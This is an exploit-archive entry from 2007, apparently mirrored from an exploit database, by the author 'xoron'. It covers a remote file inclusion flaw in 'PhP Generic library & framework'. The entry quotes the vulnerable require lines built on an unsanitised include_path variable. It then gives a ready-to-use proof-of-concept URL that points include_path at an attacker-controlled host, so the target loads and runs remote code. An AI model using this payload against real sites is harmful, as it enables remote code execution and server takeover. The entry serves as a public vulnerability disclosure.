PhP Generic library & framework (include

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PhP Generic library & framework (include_path) RFI Vulnerability
# Published : 2007-01-28
# Author : xoron
# Previous Title : xNews 1.3 (xNews.php) Remote SQL Injection Vulnerability
# Next Title : nsGalPHP (includes/config.inc.php racineTBS) Remote Inclusion Vuln

-----------------------------------------------

PhP Generic library & framework (include_path) Remote File Include Exploit

-----------------------------------------------

Author: xoron

xoron.biz

-----------------------------------------------

Code:

require $GLOBALS[include_path]."configmember.php";
require $GLOBALS[include_path]."inc-membreManager.php";

-----------------------------------------------

POC:

www.[target].com/[script_pat]/membres/membreManager.php?include_path=http://evilscripts?

-----------------------------------------------

download: http://sourceforge.net/project/showfiles.php?group_id=72529

-----------------------------------------------

xoron gider izi kalir, selametle.

kaybetmenin tiryakisi bir ?o?uk xoron.

-----------------------------------------------

# www.Syue.com [2007-01-28]